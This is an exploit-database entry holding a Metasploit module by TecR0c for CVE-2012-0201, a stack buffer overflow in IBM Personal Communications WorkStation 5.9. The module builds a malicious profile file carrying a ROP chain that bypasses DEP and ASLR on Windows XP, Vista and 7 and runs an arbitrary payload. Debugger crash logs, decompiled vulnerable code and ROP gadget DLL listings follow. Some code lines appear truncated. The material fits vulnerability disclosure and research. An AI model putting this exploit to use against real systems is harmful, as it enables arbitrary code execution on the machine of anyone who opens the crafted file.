IBM Personal Communications I-Series Access WorkStation 5.9 Profile

EKU-ID: 1558 CVE: 2012-0201 OSVDB-ID:
Author: TecR0c Published: 2012-03-01 Verified: Verified



# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
 Rank = GreatRanking # ASLR+DEP bypass
 include Msf::Exploit::FILEFORMAT
 def initialize(info = {})
   'Name'          => 'IBM Personal Communications I-Series Access WorkStation 5.9 Profile',
   'Description'   => %q{
    The IBM Personal Communications I-Series application WorkStation is susceptible to a
   stack-based buffer overflow vulnerability within file parsing in which data copied to a
   location in memory exceeds the size of the reserved destination area. The buffer is located
   on the runtime program stack.
   When the WorkStation file is opened it will reach the code path at 0x67575180 located in
   pcspref.dll which conducts string manipulation and validation on the data supplied in the
   WorkStation file. The application will first check if 'Profile' header exists and appends
   a dot with the next parameter within the file. It will then measure the character length
   of the header by calling strcspn with a dot as its null-terminated character.
   It will then write the header into memory and ensure the header ends with a NUL character.
   The parameter character array is passed to the strcpy() function. The application has
   declared a 52-element character array for the destination for strcpy function. The
   function does not perform bounds checking therefore, data can be written paste the end of
   the buffer variable resulting in corruption of adjacent variables including other local
   variables, program state information and function arguments. You will notice that the
   saved RETURN address at offset 0x6c is overwritten by the data written past the buffer.
   To ensure we can perform arbitrary code execution we must we provide a valid pointer at
   0x74 which is used as a argument for the called function at 0x675751ED as a id file
   extension parameter. Once the caller regains control we will reach our RETURN. The Ret
   instruction will be used to pop the overwritten saved return address which was currupted.
   This exploit has been written to bypass 2 mitigations DEP and ASLR on a Windows platform.
   Versions tested:
   IBM System i Access for Windows V6R1M0 version 06.01.0001.0000a
   Which bundles pcsws.exe version 5090.27271.709
   Tested on:
   Microsoft Windows XP     [Version 5.1.2600]
   Microsoft Windows Vista  [Version 6.0.6002]
   Microsoft Windows 7      [Version 6.1.7600]
   'License'       => MSF_LICENSE,
   'Author'        => 'TecR0c <roccogiovannicalvi[at]>',# Discovery & Metasploit module
   'Payload'       =>
     'Space' => 800,
     'BadChars' => "\x00\x0a\x0d\x3d"
     # NUL '\0'
     # LF  '\n' (new line)
     # CR  '\r' (carriage ret)
     # =
   'Platform'      => 'win',
   'Targets'       =>
     [ 'IBM WorkStation 5.9 (Windows XP SP3)',{} ],
     [ 'IBM WorkStation 5.9 (Windows 7, Windows Vista)',{} ],
   'References'     =>
     ['CVE', '2012-0201'],
     ['URL', '']
   'DisclosureDate' => "Feb 28 2012",
   'DefaultTarget' => 0))
   [ 'FILENAME', [ true, 'The file name.',  '' ]),
   ], self.class)
 def nops(rop=false, n=1)
  return rop ? [0x67A74499] * n : [0x90909090] * n
 def exploit
  if =~ /Windows 7/ # Plus Windows Vista
   virtualprotect =
    # - To get to the VirtualProtect Function
    # Since no Import Address Table (IAT) MS function addresses used to bypass Data Execution
    # Prevention (DEP) are imported within the applications modules which are required as they
    # have the ability to mark a portion of the stack as executable.
    # Also randomization of Windows dll's base addresses due to ASLR from Vista+ are enabled by
    # default. So we cannot directly add the MS function address into our buffer. Therefore, i
    # decided to do a [dereference] on another IAT address (kernel32.terminateprocess) then add
    # the difference between two MS functions in kernel32 to obtain my virtualprotect address so
    # i can still bypass ASLR. The closest i could get to virtualprotect function was 0x10.
    0X641A1EE2,# Removes 0XFFFFFFF0 from stack to EAX for performing calculations
    0XFFFFFFF0,# Address to get added into EAX
    0X641C20C0,# NEG operation to subtracts its operand 0XFFFFFFF0 from zero to set 0x10 in EAX
    0X67202128,# Exchanges the contents of two operands to store our 0x10 into EDX
    0X641A1EE2,# We then want to store our closest IAT address to VirtualProtect() function
    0X63B08084,# This is kernel32.terminateprocess used to get close to VirtualProtect()
    0X6412F404,# We then do a dereference to get the address of kernel32.terminateprocess
    0X6412E9AE,# We add 0x10 to kernel32.terminateprocess to load kernel32.VirtualProtect
  elsif =~ /XP SP3/
   virtualprotect =
    0X641A1EE2, # We load our VirtualProtect Address into register EAX
    0X7C801AD4, # kernel32.VirtualProtect
  rop_gadgets_p1 =
   0X67A74498,# Places the next memory address into EDI
   nops(true, 1),
   0X6414C496,# Adds the contents of source operand EAX to the destination operation EBX to set dwSize value
  rop_gadgets_p2 =
   0X641EC2D5,# Swaps values to get virtualprotect() into ESI
   0X64164082,# Put 0xFFFFFFC0 into EAX to be subtracted
   0XFFFFFFC0,# Value will be subtracted to calculate NewProtect
   0X641C20C0,# EAX equals NewProtect
   0X67202128,# Swaps values to get NewProtect parameter into EDX
   0X641F2D59,# Put next memory address into ECX
   0X67A85090,# &Writable location
   0X64164082,# Put NOPs into EAX
   0X641BFDC2,# PUSHAD all parameters for VirtualProtect
  buffer =  rand_text_alpha(104)
  buffer << [0X673188A5].pack("V")# Set EBP to a pointer to CALL ESP
  buffer << [0X64164082].pack("V")# Set EAX to nul
  buffer << [0XFFFFFC18].pack("V")# Put 0xFFFFFC18 into EAX to be subtracted to calculate dwSize
  buffer << [0X641C20C0].pack("V")# NEG operation to subtracts its operand 0xFFFFFC18 from zero to set 0x3E8 in EAX
  buffer << rop_gadgets_p1
  buffer << virtualprotect
  buffer << rop_gadgets_p2
  buffer << payload.encoded
  para_value = rand_text_alpha(3)
  eol = "\r\n"
  # We only need the header, malicious parameter with value and file extension to trigger the bug
  file =  "[Profile]" << eol
  file << "#{buffer}=#{para_value}" << eol
  file << "ID=WS"
  print_status("Creating '#{datastore['FILENAME']}' file for #{}...")
(540.25c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=003d1e49 ebx=77c5f7a0 ecx=00000000 edx=6758bdb0 esi=6758bdb1 edi=41414141
eip=77c483b7 esp=00125360 ebp=0012536c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\MSVCRT.dll -
77c483b7 8a27            mov     ah,byte ptr [edi]          ds:0023:41414141=??
ModLoad: 76980000 76988000   C:\WINDOWS\system32\LINKINFO.dll
ModLoad: 67310000 67324000   C:\Program Files\IBM\Client Access\Emulator\PCSWDLG.DLL
(5dc.65c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=00000751 edx=00009240 esi=004018a0 edi=0012faa0
eip=42424242 esp=001254e8 ebp=41414141 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
42424242 ??              ???
signed int __cdecl sub_67575180(const char *HeaderPlusParameter, char *FileExtension, int a3, int a4, int a5)
  size_t SizeOfHeader;
  char ParameterName;
  char Dest[52];
  SizeOfHeader = strcspn(HeaderPlusParameter, ".");
  strncpy(Dest, HeaderPlusParameter, SizeOfHeader);
  Dest[SizeOfHeader] = 0;
  strcpy(&ParameterName, &HeaderPlusParameter[SizeOfHeader + 1]);
  return sub_67573D80(FileExtension, Dest, &ParameterName, a3, a5, a4);
0:000> da @esp
0012555c  "AA"
ROP gadgets from images
Image name: cwbcore.dll
    Timestamp:        Wed Dec 12 04:15:43 2007 (475EC5BF)
    CheckSum:         0011CD4C
    ImageSize:        00118000
    File version:
    CompanyName:      IBM Corporation
    ProductName:      IBM(R) System i(TM) Access for Windows
Image name: PCSXFER.DLL
    Timestamp:        Wed Dec 12 04:15:48 2007 (475EC5C4)
    CheckSum:         0007130E
    ImageSize:        0006B000
    File version:     5090.1.7103.892
    CompanyName:      IBM Corporation
    ProductName:      Personal Communications
Image name: nstrc.dll
    CheckSum:         0000F9D6
    ImageSize:        00009000
    File version:     5090.0.6171.1308
    CompanyName:      IBM Corporation
    ProductName:      Personal Communications
    FileDescription:  Independent Trace Facility
Image name: PCSCTSS.DLL
    Timestamp:        Wed Dec 12 04:15:47 2007 (475EC5C3)
    CheckSum:         0001D6EB
    ImageSize:        0007D000
    File version:     5090.1.7103.892
    CompanyName:      IBM Corporation
    ProductName:      Personal Communications
Image name: PCSWDLG.DLL
    Timestamp:        Wed Dec 12 04:15:48 2007 (475EC5C4)
    CheckSum:         0001FCBC
    ImageSize:        00014000
    File version:     5090.1.7103.892
    CompanyName:      IBM Corporation
    ProductName:      Personal Communications